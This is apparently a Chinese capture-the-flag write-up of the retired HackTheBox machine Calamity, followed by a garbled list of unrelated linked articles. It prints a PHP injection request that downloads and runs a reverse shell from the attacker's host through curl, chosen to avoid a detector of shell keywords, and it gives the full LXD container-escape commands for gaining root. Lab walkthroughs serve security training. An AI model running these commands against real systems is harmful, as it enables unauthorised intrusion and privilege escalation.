在html中直接使用%3c php%3e,HTB-靶机-Calamity
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.27
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令
autorecon 10.10.10.27 -o ./calamity-autorecon
最终的扫描结果
得知开放两个端口,先访问80端口
没发现啥有价值的信息,看下上面程序跑的目录情况
发现200响应码 有最下面几个,访问了,确认admin.php看似是可以利用的
上面试了试admin/admin弱口令并未成功,然后看下burpsuite抓包情况
发现密码,使用此密码以用户admin进行登录
登录成功之后,显示上述信息,根据上述信息的提示可以是使用php进行命令执行,试了试还真可以
那么可以执行命令那么就反弹shell,这里开始使用nc,发现成功反弹之后又被踢出去了,后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致,所以我这直接使用curl命令下载php反弹shell然后执行成功反弹,下面是反弹shell请求包
GET /admin.php?html=%3C%3Fphp+system%28('curl+http://10.10.14.4:8000/rev.php+|php')%29%3F%3E HTTP/1.1Host:10.10.10.27User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
DNT:1Referer: http://10.10.10.27/admin.php
Cookie: adminpowa=noonecares
Connection: close
下载枚举脚本枚举可用的提权信息,没发现啥有价值的信息,看了下目标普通用户的家目录,发现如下信息
有些音频文件,将其传到本地kali使用工具导入合并多听几遍得出密码为18547936..* 对应登录ssh用户xalvas
成功登陆目标靶机用户xalvas,执行id命令发现含有lxd,可以通过lxd进行提权,相关参考:
https://reboare.github.io/lxd/lxd-escape.html
具体整个的提权命令如下:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/sudo ./build-alpine -a i686
wget http://10.10.14.4:8000/alpine-v3.12-x86_64-20201103_0108.tar.gz
lxc imageimport alpine-v3.12-i686-20201110_2252.tar.gz --alias bmfx
lxc image list
lxc init bmfx privesc-c security.privileged=true
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxcexec privesc --mode=interactive /bin/sh
cat/mnt/root/root/root.txt
在html中直接使用%3c php%3e,HTB-靶机-Calamity相关推荐
- html 中的空格%3c br%3e,document.write用unescape加载javascript的好处
我发现不少加载Javascript的代码都使用了unescape这个方法,我有点不解,为什么要加呢?我不加的话发现也照样加载成功且运行正常呀. 例如google分析的代码就使用了unescape这个方 ...
- html 中的空格%3c br%3e,URL编码表一览 - frabbit的个人空间 - OSCHINA - 中文开源技术交流社区...
æ 退格 TAB 换行 回车 空格 ! " # $ % & ' ( ) * + , - . / %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a ...
- php %3cpre%3c pre%3e,PHP代码执行与命令注入
1. php 代码执行 eval # 1. 没有任何过滤 @eval($_GET["cmd"]); ?> visit: ?cmd=phpinfo(); ?cmd=fputs( ...
- html%3c arial%3e,轮播图自由标注
轮播图自由标注 1.添加 数组标注 1%26%23xFF09%3B.%26%23x8FDB%3B%26%23x5165%3B%26%23x9875%3B%26%23x9762%3B%26%23x7F1 ...
- php 去掉%3c p%3e,cmseasy csrf通过一个xss最后getshell
为什么我们要选择get类型的呢,因为get类型存储到数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视t ...
- %3c strong%3e html,爱Q学习吧在线QQ强制聊天系统代码
[Ctrl+A 全部选择进行拷贝 提示:可先修改部分代码,再点击运行] QQ强制聊天 BODY { FONT-SIZE: 12px; MARGIN: 4px 0px } IMG { BORDER-RI ...
- %3c dd%3e html,index.html
超流畅漂亮的图片3D旋转滚动JS特效代码 - JS代码网 * { margin:0; padding:0; list-style:none; } body { background:black; ...
- java过滤%3c p%3e标签_解决:ajax 和 链接传值传不了等特殊字符
今天工作的时候遇到传值的值过去了发生数据丢失的情况,因为我做的功能涉及到富文本编辑器,传的值是标签语言,比如里面有src的链接里有?xxx=xxx&yyy=yyy,然后&后面的数据值丢 ...
- body%3e %3c html%3e,index.html
上流人粉丝实时查看 @font-face { font-family: 'number'; src:url('clock-number.ttf'); } html, body { padding: 0 ...
最新文章
- Linux下编译软件时指定安装目录的好处
- Android第三十一期 - 市面上所有引导页的效果
- 查看linux中某个端口(port)是否被占用
- DES对称加密(1)算法说明
- leetcode 91. Decode Ways | 91. 解码方法(动态规划)
- 第七节:EF Core调用SQL语句和存储过程
- hash table(开放寻址法-双重散列实现的哈希表)
- 【前端工程师手册】JavaScript作用域拾遗
- 2019计算机组成原理及答案,2019计算机组成原理复习题(一)
- vSphere 高级特性FT配置与管理
- 7-6 逆序的三位数 (10 分)
- Redis+Nginx+设计模式+Spring全家桶+Dubbo+阿里P8技术精选文档
- 【JWT】JWT+HA256加密 Token验证
- 项目周报模板(工作周报模板)
- jmail qq邮箱的服务器,asp jmail qq邮箱发送邮件方法
- vivado仿真时候报错Common 17-39
- python 图片处理模块_python Image 模块处理图片
- 企查查接口php版本~
- 用天球星座测量地球表面经纬度的方法
- java回溯算法解决数独_js回溯算法解决数独问题